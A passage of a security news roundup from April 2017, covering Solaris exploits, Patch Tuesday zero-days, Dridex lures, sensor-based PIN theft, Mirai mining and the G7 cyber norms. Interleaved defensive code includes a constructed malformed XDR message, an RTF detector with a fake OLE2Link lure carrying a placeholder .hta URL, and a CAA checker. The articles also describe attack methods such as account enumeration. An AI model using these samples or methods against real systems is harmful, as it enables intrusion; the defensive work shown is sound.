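    return struct.pack(">I", len(data)) + data + b"\0" * ((-len(data)) % 4)


def parse_request(msg: bytes):
    """Decode a hypothetical two-field request: string<64> name, opaque<256> blob."""
    name, off = decode_string(msg, 0, 64)
    blob, off = decode_opaque(msg, off, 256)
    if off != len(msg):
        raise XdrError("trailing bytes after last field")
    return {"name": name, "blob": blob}


def classify(msg: bytes) -> str:
    """Return 'ok' or the rejection reason, suitable for a pre-filter or a log line."""
    try:
        parse_request(msg)
        return "ok"
    except XdrError as exc:
        return str(exc)


# Constructed messages: one well-formed, one carrying the oversized length
# field a remote exploit would send to a decoder that trusts it.
GOOD_MSG = encode_opaque(b"nfs") + encode_opaque(b"\x01\x02\x03")
EVIL_MSG = struct.pack(">I", 0xFFFFFFFF) + b"A" * 16

if __name__ == "__main__":
    print(classify(GOOD_MSG))   # ok
    print(classify(EVIL_MSG))   # declared length 4294967295 exceeds maximum 64
```

The order of the checks matters more than it looks. In a C decoder the padding arithmetic is done on a 32-bit unsigned value, and (0xFFFFFFFF + 3) & ~3 wraps to 0, so a decoder that computes the padded size first and only then compares it with the remaining bytes will accept the message and copy 4 GB into its destination. Compare the raw length against the declared maximum before doing any arithmetic on it, or do the arithmetic in a wider type.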


In short, the NSA could open a root shell on any Solaris system, and the experts noted that using the exploits requires no particular skill.

“These are prebuilt static binaries and you can run them out of the box with very little technical knowledge,” Hickey told The Register.

Hacker Fantastic @hackerfantastic
The NSA had the power to hack any Oracle Solaris box in the world via UDP/TCP generically with anti-forensics capabilities and its public.
12:23 AM - 11 Apr 2017
Hickey used the popular Shodan.io search engine to look for exposed Solaris hosts and found thousands of vulnerable systems. The real threat, he said, is that many more of these machines run internally behind firewalls, where the exploit code could be used to root them and move laterally once an attacker gains a foothold inside an organization.


Microsoft Issues Patches for Actively Exploited Critical Vulnerabilities
11.4.2017 thehackernews Vulnerebility
Besides a previously undisclosed code-execution flaw in Microsoft Word, the tech giant patches two more zero-day vulnerabilities that attackers had been exploiting in the wild for months, as part of this month's Patch Tuesday.
In total, Microsoft patches 45 unique vulnerabilities in its nine products, including three previously undisclosed vulnerabilities under active attack.
The first vulnerability (CVE-2017-0199) under attack is a remote-code execution flaw that could allow an attacker to remotely take over a fully patched and up to date computer when the victim opens a Word document containing a booby-trapped OLE2link object.
The attack can bypass most exploit mitigations developed by Microsoft, and according to Ryan Hanson of security firm Optiv, in some cases, exploits can execute malicious code even when Protected View is enabled.
As The Hacker News reported Monday, this code-execution flaw in Microsoft Word was being exploited by hackers to spread a version of infamous Dridex banking trojan.
Also, according to blog posts published Tuesday by security firms FireEye and Netskope, hackers are exploiting the same Word vulnerability to install Latentbot and Godzilla malware respectively.
Microsoft has released a fix for CVE-2017-0199 and credited Hanson with responsibly reporting the critical vulnerability to the company.
Patch for Critical IE Flaw Being Exploited in the Wild
The company also pushed out a patch for another critical vulnerability (CVE-2017-0210) under active attack, an elevation of privilege flaw in Internet Explorer that is exploited by tricking a victim into visiting a specially crafted website.
The vulnerability could allow the attacker to access sensitive information from one domain and inject it into another domain.
"The vulnerability by itself does not allow arbitrary code to be run. However, the vulnerability could be used in conjunction with another vulnerability (for example, a remote code execution vulnerability) that could take advantage of the elevated privileges when running arbitrary code," Microsoft's guidance for the flaw reads.
This IE vulnerability is also being exploited in the wild.
Another Critical Word Vulnerability Yet Unpatched!
The third previously undisclosed flaw resides in the Encapsulated PostScript (EPS) filter in Microsoft Office. Microsoft tracks it under the identifier 2017-2605 (no CVE has been assigned) and did not actually release a fix for it in Tuesday's update batch.
However, the tech giant issued an update for Microsoft Office that disables the EPS filter by default as a defense-in-depth measure. This vulnerability is also being exploited in the wild when a target opens a malicious EPS image in Word.
"Microsoft is aware of limited, targeted attacks that could leverage an unpatched vulnerability in the EPS filter and is taking this action to help reduce customer risk until the security update is released," the guidance for the flaw reads.
The company also issued a patch for Windows 10 Creators Update, which was made available on Tuesday, addressing some remote code execution flaws and elevation of privilege bugs.
In total, Microsoft rolled out 15 security updates on Tuesday patching dozens of unique CVEs in its products, including the Windows OS, Exchange Server, Edge and Internet Explorer, Office, Office Services and Office Web Apps, Visual Studio for Mac, Silverlight and Adobe Flash.
Users are strongly advised to install updates as soon as possible in order to protect themselves against the active attacks in the wild on three separate Microsoft products.


Hackers Can Steal Your Passwords Just by Monitoring SmartPhone Sensors
11.4.2017 thehackernews Mobil
Do you know how many kinds of sensors your smartphone has inbuilt? And what data they gather about your physical and digital activities?
An average smartphone these days is packed with a wide array of sensors such as GPS, Camera, microphone, accelerometer, magnetometer, proximity, gyroscope, pedometer, and NFC, to name a few.
Now, according to a team of scientists from Newcastle University in the UK, attackers can guess the PINs and passwords you enter on a bank website, in an app or on your lock screen to a surprising degree of accuracy by monitoring your phone's sensors, such as the angle and motion of the phone while you type.
The danger stems from the way malicious websites and apps can read most of a smartphone's internal sensors without requesting any permission. It makes no difference that you are entering your password on a secure website over HTTPS: the sensor data is read on the device itself, not taken from the connection.
Your Phone doesn't Restrict Apps from Accessing Sensors' Data
Your smartphone apps usually ask your permissions to grant them access to sensors like GPS, camera, and microphone.
But because of the boom in mobile gaming and health and fitness apps over the last few years, mobile operating systems do not restrict installed apps from reading the many other sensors, such as the accelerometer, gyroscope, rotation, proximity and NFC sensors.
Any malicious app can then use these data for nefarious purposes. The same is also true for malformed websites.
"Most smartphones, tablets and other wearables are now equipped with a multitude of sensors, from the well-known GPS, camera, and microphone to instruments such as the gyroscope, proximity, NFC, and rotation sensors and accelerometer," Dr. Maryam Mehrnezhad, the paper's lead researcher, said describing the research.
"But because mobile apps and websites don't need to ask permission to access most of them, malicious programs can covertly 'listen in' on your sensor data and use it to discover a wide range of sensitive information about you such as phone call timing, physical activities and even your touch actions, PINs and passwords."
Video Demonstration of the Attack

Scientists have even demonstrated an attack that can record data from around 25 sensors in a smartphone. They have also provided a video demonstration of their attack, showing how their malicious script is collecting sensor data from an iOS device.
The team wrote a malicious JavaScript file that can read these sensors and log their data. Such a script can be embedded in a mobile app or loaded by a website without your knowledge.
All an attacker then needs is to trick the victim into installing the malicious app or visiting the rogue website.
Once that is done, while the malicious app or page keeps running in the background, the script continues to read the various sensors as the victim types, records the data needed to guess the PIN or password, and sends it to an attacker's server.
Guessing PINs and Passwords with a High Degree of Accuracy
Using only motion and orientation sensor data, which require no special permission to access, logged from 50 devices, the researchers guessed four-digit PINs with 74% accuracy on the first try and 100% accuracy by the fifth try.
The scientists were even able to use the collected data to determine where users were tapping and scrolling, what they were typing on a mobile web page and what part of the page they were clicking on.
The researchers say their aim was to raise awareness of the many smartphone sensors that apps can access without any permission and for which vendors have not yet added restrictions to their standard permission models.
"Despite the very real risks, when we asked people which sensors they were most concerned about we found a direct correlation between perceived risk and understanding," Mehrnezhad said. "So people were far more concerned about the camera and GPS than they were about the silent sensors."
Mehrnezhad says the team has alerted leading browser vendors such as Google and Apple to the risks; some, including Mozilla and Safari, have partially fixed the issue, and the team is still working with the industry on a complete solution.
More technical details can be found in the full research paper, titled "Stealing PINs via mobile sensors: actual risk versus user perception," published Tuesday in the International Journal of Information Security.


Adobe Patches Flash, Reader Flaws Exploited at Pwn2Own

12.4.2017 securityweek Vulnerebility
Adobe released security updates for several of its products on Tuesday to address a total of 59 vulnerabilities, including flaws disclosed last month at the Pwn2Own 2017 hacking competition.

A majority of the security holes, 47 to be precise, have been patched in the Windows and Mac versions of Adobe Acrobat and Reader. The vulnerabilities, rated critical with a priority rating of 2 (i.e. no exploits and exploitation not imminent), have been described as memory corruptions that could lead to arbitrary code execution or memory address leaks.

Seven critical vulnerabilities have been patched in Adobe Flash Player. The security holes are use-after-free and memory corruption issues that could lead to code execution.

Many of the flaws patched on Tuesday were reported to Adobe via Trend Micro’s Zero Day Initiative (ZDI), including several Reader and Flash Player vulnerabilities disclosed at ZDI’s Pwn2Own competition.

ZDI has published five advisories detailing the Pwn2Own security holes tracked as CVE-2017-3062, CVE-2017-3063, CVE-2017-3055, CVE-2017-3056 and CVE-2017-3057.

Adobe has also resolved vulnerabilities in Photoshop CC for Mac and Windows, Campaign, and the Creative Cloud Desktop Application for Windows. The company has found no evidence of exploitation in the wild.

Microsoft has also released patches for tens of vulnerabilities this Tuesday, including for zero-day flaws exploited in the wild.

One of the zero-days is CVE-2017-0199, an Office and WordPad vulnerability that has been exploited to deliver malware such as Dridex, WingBird, Latentbot and Godzilla. Another zero-day is CVE-2017-0210, a privilege escalation vulnerability affecting Internet Explorer.

The third zero-day impacts Office and it hasn’t actually been patched, but Microsoft did release a mitigation that should help reduce the risk of exploitation. This flaw has been exploited in limited, targeted attacks.


Microsoft Patches Office, IE Flaws Exploited in Attacks

12.4.2017 securityweek Vulnerebility
Microsoft’s security updates for April 2017 address more than 40 critical, important and moderate severity vulnerabilities, including three zero-day flaws that have been exploited in attacks.

According to Microsoft, the updates resolve flaws affecting Edge, Internet Explorer, Windows, Office, Visual Studio for Mac, .NET Framework, Silverlight and Adobe Flash Player components.

One of the zero-days patched by Microsoft this month is CVE-2017-0199, an Office and WordPad vulnerability that can be exploited for remote code execution. The security hole has been exploited in the wild by malicious actors to deliver various pieces of malware, including Dridex, WingBird, Latentbot and Godzilla.

Another vulnerability that has been actively exploited is CVE-2017-0210, a privilege escalation weakness affecting Internet Explorer. Microsoft said the flaw exists due to the lack of proper enforcement of cross-domain policies, and it can be exploited by tricking the targeted user into accessing a specially crafted web page. However, the company has not shared any information about the attacks it has been exploited in.

The third zero-day, an Office flaw which Microsoft says has been exploited in limited targeted attacks, has not been patched with this month’s updates. However, the company has released a mitigation that should help reduce the risk of exploitation until a patch is made available.

The issue, tracked by Microsoft with the identifier 2017-2605 (no CVE), is related to the Encapsulated PostScript (EPS) Filter in Office. The company’s mitigation turns off the EPS filter by default.

The list of critical flaws addressed on Tuesday also includes 13 bugs affecting Internet Explorer, Edge, .NET, Office and Hyper-V.

Microsoft has been transitioning from security bulletins to a database called Security Update Guide. The transition has now been completed – no security bulletins have been published this month – and while some users welcome the change, others said they liked the old format better.

“[The] Security Update Guide provides a number of nice filtering options, but you lose a bit of the organization,” said Chris Goettl, product manager with Ivanti. “For instance, to look at all CVEs that are resolved for a single update, you must now look at each individually where the bulletin page had them organized into one place. Likely, it will take a while for people to get used to.”

It’s also worth noting that this is the last round of security updates for Windows Vista, which has reached end of support.

Adobe patches tens of flaws across several products

Security updates released on Tuesday by Adobe patch nearly 60 vulnerabilities across several of the company’s products. The Acrobat and Reader updates address 47 flaws, including many that could lead to arbitrary code execution.

The rest of the security holes impact Flash Player, Photoshop CC for Mac and Windows, Campaign, and the Creative Cloud Desktop Application for Windows. Adobe has found no evidence of exploitation in the wild.


Microsoft Patch Tuesday fixes three flaws actively exploited in attacks in the wild
12.4.2017 securityaffairs Vulnerebility

Today Microsoft Patch Tuesday fixed the zero-day Word vulnerability that has been actively exploited in attacks in the wild.
Microsoft today patched the zero-day Word vulnerability that has been exploited in attacks in the wild. Just yesterday I wrote about a phishing campaign leveraging the flaw to deliver the Dridex banking Trojan.

Microsoft published security patches that addressed a total of 45 CVEs in nine products, including Internet Explorer, Microsoft Edge and Windows 10. Most of the updates address problems in Microsoft IE and Edge browsers.

The company confirmed that three of the vulnerabilities among this Tuesday updates are under active attack in the wild.

The first vulnerability actively exploited by attackers is tracked as CVE-2017-0199; it allows attackers to use a specially crafted document embedding an OLE2link object to spread malware such as the Dridex banking Trojan.

“While labelled as an Outlook issue, this bug actually stems from an issue within RTF files. According to published reports, the exploit uses an embedded OLE2link object in a specially-crafted document. It should also be noted that these attacks can be thwarted by enabling Office’s Protected View feature. There are updates for both Office and Windows to be applied, and both should be considered necessary for complete protection.” reads the Patch Tuesday analysis by the Zero Day Initiative.

The second flaw exploited in the wild is an Internet Explorer elevation of privilege vulnerability tracked as CVE-2017-0210. The flaw could be exploited by attackers to access information from one domain and inject it into another domain.

“The exploit allows an attacker to access sensitive information from one domain and inject it into another domain, which could allow the attacker to gain elevated privileges. However, direct code execution is not possible through this bug alone. Instead, it would likely be used with a bug that executes code at a low integrity level to elevate the code execution to medium level integrity.” continues ZDI.

Microsoft also published 2017-2605, “Defense-in-Depth Update for Microsoft Office”, for a flaw in the Encapsulated PostScript (EPS) filter in Office that has not been assigned a CVE identifier.

“According to Microsoft, they are aware of “limited targeted attacks” that take advantage of an unpatched vulnerability in the EPS filter. This temporary measure is being pushed out until a true fix is released. Issues like this used to be covered by Security Advisories, so perhaps this indicates Microsoft has chosen to do away with these as well.” states the analysis.

Microsoft did not issue an update that fixes this flaw; instead it updated Microsoft Office to turn off the EPS filter by default as a defense-in-depth measure.


Microsoft also issued a fix for Windows 10 (Creators Update) that addresses several remote code execution and elevation of privilege flaws.

Looking at the list of vulnerabilities fixed by this Patch Tuesday, we find among others:

CVE-2017-0201 IE RCE vulnerability ;
CVE-2017-0093 Edge scripting engine memory corruption vulnerability;
CVE-2017-0162, CVE-2017-0163, CVE-2017-0180 Hyper-V vulnerabilities;


The Mirai botnet is back and includes a Bitcoin Mining component
12.4.2017 securityaffairs BotNet

Experts at IBM X-Force security firm warn of a new Mirai Botnet implementing Bitcoin crypto-currency mining capabilities.
The Mirai botnet was first spotted in August 2016 by the security researcher MalwareMustDie. It was specifically designed to compromise vulnerable or poorly protected IoT devices; once Mirai compromises a device it recruits it into a botnet used primarily to launch DDoS attacks, such as the one that hit the Dyn DNS service.

In October 2016, the Mirai source code was leaked and threat actors in the wild started customizing their Mirai botnet.

The latest Mirai variant spotted in the wild by IBM researchers adds a further capability: a component for Bitcoin mining.

This is not surprising. Crooks seize every opportunity, and the value of the crypto-currency has doubled in recent months, passing $1,290 per bitcoin a few weeks ago.

“This new variant of ELF Linux/Mirai malware with the bitcoin mining component has us pondering, though.” reads the analysis published by IBM X-Force security researchers. “Attackers certainly have much to gain from having bitcoins in their pocket to facilitate their cybercriminal activities — bitcoin is the currency of choice for purchasing illegal commodities such as malware.”

The new Bitcoin mining-capable Mirai botnet was involved in a short-lived, high-volume campaign at the end of March.


The malware targets Linux machines running BusyBox, most of them DVR servers with default Telnet credentials.

The new Mirai variant targets this category of IoT device and also tries to use the devices’ computing power to mine Bitcoin.

“The new ELF Linux/Mirai malware variant we discovered included another add-on: a bitcoin miner slave. This led us to question the effectiveness of a bitcoin miner running on a simple IoT device that lacks the power to create many bitcoins, if any at all. Given Mirai’s power to infect thousands of machines at a time, however, there is a possibility that the bitcoin miners could work together in tandem as one large miner consortium.” continues IBM. “We haven’t yet determined that capability, but we found it to be an interesting yet concerning possibility. It’s possible that while the Mirai bots are idle and awaiting further instructions, they could be leveraged to go into mining mode.”

The IBM experts found the Mirai dropper on a web console and linked the associated site to a series of high-volume command injection attacks.

The website was used by operators as a malware package archive repository, experts discovered that the file package also included a Dofloo backdoor and a Linux shell.


G7 DECLARATION ON RESPONSIBLE STATES BEHAVIOR IN CYBERSPACE
12.4.2017 securityaffairs BigBrothers

Presented the voluntary, non-binding norms of State behavior during peacetime in the G7 DECLARATION ON RESPONSIBLE STATES BEHAVIOR IN CYBERSPACE.
The risk of escalation and retaliation in cyberspace, the increasing number of cyber attacks and ever more sophisticated cyber threats could have a destabilizing effect on international peace and security. The risk of conflict between States caused by cyber incidents makes it important for all States to engage in law-abiding, norm-respecting and confidence-building behavior in their use of ICT.


I’m very proud to share with you the G7 DECLARATION ON RESPONSIBLE STATES BEHAVIOR IN CYBERSPACE; I had the honor to be a member of the group that worked on the proposal for voluntary, non-binding norms of State behavior during peacetime. We presented 12 points aimed at promoting stability and security in cyberspace. The declaration invites all States to collaborate with the intent of reducing risks to international peace, security and stability.

Below are the 12 points presented in the Declaration:

1. Consistent with the purposes of the United Nations, including to maintain international peace and security, States should cooperate in developing and applying measures to increase stability and security in the use of ICTs and to prevent ICT practices that are acknowledged to be harmful or that may pose threats to international peace and security;
2. In case of ICT incidents, States should consider all relevant information, including the larger context of the event, the challenges of attribution in the ICT environment and the nature and extent of the consequences;
3. States should not knowingly allow their territory to be used for internationally wrongful acts using ICTs;
4. States should consider how best to cooperate to exchange information, assist each other, prosecute terrorist and criminal use of ICTs and implement other cooperative measures to address such threats. States may need to consider whether new measures need to be developed in this respect;
5. States, in ensuring the secure use of ICTs, should respect Human Rights Council resolutions 20/8 and 26/13 on the promotion, protection and enjoyment of human rights on the Internet, as well as General Assembly resolutions 68/167 and 69/166 on the right to privacy in the digital age, to guarantee full respect for human rights, including the right to freedom of expression;
6. A State should not conduct or knowingly support ICT activity contrary to its obligations under international law that intentionally damages critical infrastructure or otherwise impairs the use and operation of critical infrastructure to provide services to the public;
7. States should take appropriate measures to protect their critical infrastructure from ICT threats, taking into account General Assembly resolution 58/199 on the creation of a global culture of cybersecurity and the protection of critical information infrastructures, and other relevant resolutions;
8. States should respond to appropriate requests for assistance by another State whose critical infrastructure is subject to malicious ICT acts. States should also respond to appropriate requests to mitigate malicious ICT activity aimed at the critical infrastructure of another State emanating from their territory, taking into account due regard for sovereignty;
9. States should take reasonable steps to ensure the integrity of the supply chain so that end users can have confidence in the security of ICT products. States should seek to prevent the proliferation of malicious ICT tools and techniques and the use of harmful hidden functions;
10. States should encourage responsible reporting of ICT vulnerabilities and share associated information on available remedies to such vulnerabilities to limit and possibly eliminate potential threats to ICTs and ICT-dependent infrastructure;
11. States should not conduct or knowingly support activity to harm the information systems of the authorized emergency response teams (sometimes known as computer emergency response teams or cybersecurity incident response teams) of another State. A State should not use authorized emergency response teams to engage in malicious international activity;
12. No country should conduct or support ICT-enabled theft of intellectual property, including trade secrets or other confidential business information, with the intent of providing competitive advantages to companies or commercial sectors.
Let me thank the colleagues Luigi Martino and Marco Lapadura that worked with me at the declaration, and of course to Minister Gianfranco Incarnato that led the group of work.


Canada Court Denies Accused Yahoo Hacker Bail

12.4.2017 securityweek Crime
A Canadian court on Tuesday denied bail to a man accused of carrying out devastating cyberattacks on Yahoo as he awaits possible extradition to the United States to face criminal charges.

Karim Baratov, 22, an immigrant from Kazakhstan, was arrested on a US warrant in March for alleged hacking, commercial espionage and related crimes.

His lawyers said they will fight the extradition request. A hearing could begin as early as June and the process of deciding whether to extradite Baratov is expected to last up to three years.

US authorities alleged Russian intelligence agents hired Baratov and another hacker to carry out attacks on Yahoo from 2014 to 2016.

The data breach compromised 500 million Yahoo accounts and is one of the largest cyberattacks in history. Targets included Russian and US government officials, cyber security, diplomatic and military personnel, journalists, companies and financial firms.

Baratov's lawyers had asked that he be remanded into his parents' custody. His father vowed strict supervision at home, telling the court: "Jail would look like paradise."

But prosecutors said Baratov has ties to foreign spies and posed a flight risk, noting that one of his co-accused in the case fled to Russia.


Mandatory Certificate Authority Authorization Checks Will Boost Domain Security

12.4.2017 securityweek Safety
The issuance of SSL/TLS (Secure Sockets Layer/Transport Layer Security) certificates is expected to become a more secure process this September, after the implementation of mandatory Certificate Authority Authorization (CAA) checks.

After Certificate Authorities (CAs) and browser makers voted last month to make CAA checking mandatory, the new standard will be implemented starting September 8, 2017, according to Ballot 187 on the CA/Browser Forum site. Starting then, all CAs will have to check CAA records at issuance time for all certificates, which should prevent them from issuing certificates if not permitted to.

CAA is a DNS Resource Record that “allows a DNS domain name holder to specify one or more Certification Authorities (CAs) authorized to issue certificates for that domain and, by implication, that no other CAs are authorized.”

Domain owners will be able to set an issuance policy that all publicly-trusted CAs should comply with, thus preventing CAs from wrongfully issuing HTTPS certificates. This new standard should also mitigate the issue that “the public CA trust system is only as strong as its weakest CA,” Ballot 187 also reveals.

CAs will have to check “for a CAA record for each dNSName in the subjectAltName extension of the certificate to be issued.” The standard does not prevent CAs from checking CAA records at other times as well.

CAA checking is not required in a few specific scenarios, such as for “certificates for which a Certificate Transparency pre-certificate was created and logged in at least two public logs, and for which CAA was checked.”

If the CA or an Affiliate of the CA is the DNS Operator of the domain’s DNS, CAA checking becomes optional, the same as “for certificates issued by a Technically Constrained Subordinate CA Certificate as set out in Baseline Requirements section 7.1.5, where the lack of CAA checking is an explicit contractual provision in the contract with the Applicant.”

CAs are also required to document potential issuances that were prevented by the CAA, and should also send reports of the requests to the contact(s) stipulated in the CAA iodef record(s), if present.
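The decision a CA has to make under Ballot 187 (climb from the requested name to its parents until a CAA RRset is found, then honor the issue property, or issuewild for wildcard names, and report refusals to the iodef contact) is easier to reason about in code. The following added example is neither the CA/Browser Forum's nor any CA's software: it evaluates a constructed in-memory zone instead of querying DNS, the domain names and CA identifiers in it are hypothetical, and it leaves out the CNAME and DNAME handling a real implementation needs.

```python
from dataclasses import dataclass

ISSUER_CRITICAL = 128  # CAA flags bit: a CA that does not understand the tag must not issue


@dataclass(frozen=True)
class CaaRecord:
    flags: int
    tag: str
    value: str


# Constructed in-memory zone (hypothetical names and CA identifiers):
# owner name -> CAA RRset. Names absent from the dict have no CAA records.
ZONE = {
    "example.test": [
        CaaRecord(0, "issue", "ca-alpha.test"),
        CaaRecord(0, "issuewild", ";"),              # nobody may issue *.example.test
        CaaRecord(0, "iodef", "mailto:security@example.test"),
    ],
    "shop.example.test": [CaaRecord(0, "issue", "ca-beta.test; account=42")],
    "locked.example.test": [CaaRecord(ISSUER_CRITICAL, "futuretag", "x")],
}


def relevant_caa(name, zone):
    """RFC 6844 climb: the first CAA RRset found at the name or at any parent.

    Returns (owner_name, rrset); (None, []) when no ancestor has CAA records.
    """
    labels = name.lower().strip(".").split(".")
    for i in range(len(labels)):
        owner = ".".join(labels[i:])
        rrset = zone.get(owner)
        if rrset:
            return owner, rrset
    return None, []


def parse_issue_value(value):
    """'ca.test; account=42' -> ('ca.test', {'account': '42'}); ';' -> ('', {})."""
    head, _, tail = value.partition(";")
    params = {}
    for item in tail.split(";"):
        key, _, val = item.partition("=")
        if key.strip():
            params[key.strip()] = val.strip()
    return head.strip().lower(), params


def may_issue(name, ca, zone):
    """Decide whether `ca` may issue for `name` ('*.x' requests a wildcard).

    Returns (allowed, reason); the reason is what a CA should log for audit.
    """
    wildcard = name.startswith("*.")
    base = name[2:] if wildcard else name
    owner, rrset = relevant_caa(base, zone)
    if not rrset:
        return True, "no CAA records at the name or any parent"
    known = {"issue", "issuewild", "iodef"}
    for r in rrset:
        if r.tag.lower() not in known and r.flags & ISSUER_CRITICAL:
            return False, f"critical unknown tag '{r.tag}' at {owner}"
    # issuewild governs wildcard names only when at least one is present;
    # for non-wildcard names issuewild records are ignored entirely.
    tag = "issue"
    if wildcard and any(r.tag.lower() == "issuewild" for r in rrset):
        tag = "issuewild"
    grants = [r for r in rrset if r.tag.lower() == tag]
    if not grants:
        return True, f"CAA at {owner} has no {tag} property, issuance unrestricted"
    for r in grants:
        domain, _params = parse_issue_value(r.value)
        if domain and domain == ca.lower():
            return True, f"{tag} at {owner} authorizes {ca}"
    return False, f"{tag} at {owner} does not authorize {ca}"


def iodef_contacts(name, zone):
    """Where a CA reports a refused issuance, the reporting duty in Ballot 187."""
    base = name[2:] if name.startswith("*.") else name
    _owner, rrset = relevant_caa(base, zone)
    return [r.value for r in rrset if r.tag.lower() == "iodef"]


if __name__ == "__main__":
    for req in ("www.example.test", "*.example.test", "shop.example.test", "locked.example.test"):
        for ca in ("ca-alpha.test", "ca-beta.test"):
            print(req, ca, may_issue(req, ca, ZONE))
```

Two behaviours in the zone above are worth noticing when writing your own records. A CAA set at a subdomain replaces the parent's set entirely, so shop.example.test authorizes only ca-beta.test even though the parent names ca-alpha.test, and the empty issuer in issuewild ";" is the documented way to forbid wildcard certificates from every CA while still allowing ordinary ones.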

17 out of 19 voting CAs (94%) voted in favor of the new CAA standard. All three participating browser makers (Mozilla, Google, and Apple) voted in favor.


Dridex Attacks Exploit Recent Office 0-Day

11.4.2017 securityweek Exploit
A recently revealed zero-day vulnerability in Microsoft Office is being exploited by the Dridex banking Trojan to compromise unsuspecting victims’ computers, Proofpoint security researchers warn.

Detailed recently by McAfee and FireEye, the zero-day allows an attacker to achieve code execution on compromised machines. Leveraging Office’s Object Linking and Embedding (OLE) functionality, an attacker could create a malicious RTF (Rich Text Format) document that links to an HTA (HTML Application) file hosted on remote servers, which in turn executes a malicious Visual Basic script.
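A triage check for the document structure just described, added here as an example and not code from Proofpoint, FireEye or McAfee. It pulls the hex payload out of every \objdata group in an RTF file, decodes it, and flags the combination that characterizes these lures: an OLE2Link class name inside the object data, an \objupdate or \objautlink control word that makes Word refresh the link when the file is opened, and a URL embedded in the object. The two RTF samples are constructed for the example, the object payloads are stand-ins rather than real OLE streams, and the URL in the lure is a placeholder.

```python
import re

HEX_DIGIT = re.compile(r"[0-9A-Fa-f]")
CONTROL_WORD = re.compile(r"\\[A-Za-z]+-?\d*\s?")
# UTF-16LE "http://..." or "https://..." up to the first non-printable code unit.
UTF16_URL = re.compile(rb"[hH]\x00[tT]\x00[tT]\x00[pP]\x00(?:[sS]\x00)?:\x00(?:[\x21-\x7e]\x00)+")


def _group_body(text, open_idx):
    """Text inside the RTF group whose '{' is at text[open_idx]."""
    depth = 0
    for i in range(open_idx, len(text)):
        if text[i] == "{":
            depth += 1
        elif text[i] == "}":
            depth -= 1
            if depth == 0:
                return text[open_idx + 1:i]
    return text[open_idx + 1:]           # unterminated group: take the rest


def extract_objdata(rtf):
    """Decoded bytes of every \\objdata hex blob in the document."""
    blobs = []
    for m in re.finditer(r"\\objdata\b", rtf):
        open_idx = rtf.rfind("{", 0, m.start())
        body = _group_body(rtf, open_idx)
        payload = body[m.end() - open_idx - 1:]         # after the keyword, inside the group
        payload = CONTROL_WORD.sub("", payload).replace("{", "").replace("}", "")
        hexstr = "".join(HEX_DIGIT.findall(payload))
        blobs.append(bytes.fromhex(hexstr[:len(hexstr) & ~1]))
    return blobs


def embedded_urls(blob):
    """Printable UTF-16LE URLs found in an object payload (URL monikers store them that way)."""
    return [m.group(0).decode("utf-16-le") for m in UTF16_URL.finditer(blob)]


def triage_rtf(rtf):
    """Heuristic verdict: \\object present, OLE2Link class name, and auto-update or an embedded URL."""
    blobs = extract_objdata(rtf)
    has_object = re.search(r"\\object\b", rtf) is not None
    auto_update = re.search(r"\\obj(?:update|autlink)\b", rtf) is not None
    ole2link = any(b"OLE2Link" in b for b in blobs)
    urls = [u for b in blobs for u in embedded_urls(b)]
    return {
        "object": has_object,
        "auto_update": auto_update,
        "ole2link": ole2link,
        "urls": urls,
        "suspicious": has_object and ole2link and (auto_update or bool(urls)),
    }


# Constructed samples. The payloads are stand-ins, not real OLE streams: a few
# placeholder header bytes, a class name and, for the lure, a placeholder URL.
_LURE_BLOB = (b"\x01\x05\x00\x00\x02\x00\x00\x00" + b"OLE2Link\x00"
              + "http://example.invalid/s.hta".encode("utf-16-le") + b"\x00\x00")
_BENIGN_BLOB = b"\x01\x05\x00\x00\x02\x00\x00\x00" + b"Package\x00"

SUSPICIOUS_RTF = ("{\\rtf1\\ansi\\deff0 Scan Data\\par"
                  "{\\object\\objautlink\\objupdate{\\*\\objdata " + _LURE_BLOB.hex() + "}}}")
BENIGN_RTF = ("{\\rtf1\\ansi\\deff0 Quarterly summary\\par"
              "{\\object\\objemb{\\*\\objdata " + _BENIGN_BLOB.hex() + "}}}")

if __name__ == "__main__":
    print(triage_rtf(SUSPICIOUS_RTF))
    print(triage_rtf(BENIGN_RTF))
```

Treat the verdict as a triage signal rather than proof: linked objects that update on open are legitimate in some documents, such as reports with linked spreadsheet charts, so the extracted URL is the item to act on, by blocking the host and hunting for other mail that references it.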

According to Proofpoint, the vulnerability is being exploited in malicious documents emailed to millions of recipients across various organizations, primarily in Australia, which ultimately install the Dridex Trojan on the compromised system.

The campaign features messages supposedly coming from “<[device]@[recipient's domain]>”, where [device] could be “copier”, “documents”, “noreply”, “no-reply”, or “scanner.” All emails use “Scan Data” as subject line, while the attached Microsoft Word RTF document is named “Scan_xxxx.doc” or “Scan_xxxx.pdf.”

“Note that while this campaign does not rely on sophisticated social engineering, the spoofed email domains and common practice of emailing digitized versions of documents make the lures fairly convincing,” Proofpoint says.

When the malicious document is opened, the exploit carries out a series of operations that eventually result in Dridex botnet ID 7500 being installed on the victim’s system. The security researchers noticed that the exploit worked without user interaction: the system was compromised even if the user was presented a dialog about the document containing “links that may refer to other files.”

The particular instance of Dridex distributed as part of this infection campaign was observed using over 100 injects for known banks and for various other popular applications and online destinations.

“Although document exploits are being used less frequently in the wild, with threat actors favoring social engineering, macros, and other elements that exploit "the human factor," this campaign is a good reminder that actors will shift tactics as necessary to capitalize on new opportunities to increase the effectiveness of their efforts,” Proofpoint says.


Hackers Targeting Amazon Third-Party Sellers With Password Reuse Attacks

11.4.2017 securityweek Hacking
Cyber criminals are re-using stolen passwords to access the accounts of third-party sellers on Amazon. They then change the bank account details and simply redirect customer payments to their own bank accounts. Where they find an old and disused account, they promote non-existent deals with heavy discounts, and again divert the proceeds to their own bank account. It should be noted that this is not an attack against Amazon users, but against Amazon third-party sellers.

It would be wrong to say that Amazon is being hacked. Legitimate passwords are being used to access legitimate accounts. These passwords come from the billions of stolen passwords available on the internet. Where there is a fault, it is in users' continued tendency to use the same password across multiple accounts; and to rarely, if ever, change them.

The only real difficulty for the criminals is matching the stolen and reused password to the Amazon account -- and this is not hard. Since almost all services employ the user's email address as the username, it is merely a question of locating a third-party seller, finding the seller's email address, and trying the associated password from the list of stolen passwords. "The attackers are mining the rich seam of stolen credentials publicly dumped or traded in underground forums," ESET senior research fellow David Harley told SecurityWeek. "That way, they only need to match known credentials to Amazon account holders."

Even if the seller's email address is not known, it could possibly be obtained from Amazon itself. "If Amazon is the weak spot, perhaps the registration page?" suggested Sean Sullivan, security advisor at F-Secure. "The 'Create account' page looks like something that could be targeted with a list of addresses, from which could easily be noted those to result in a message of 'email is already in use'. Then you have addresses to try on the sign-in page."

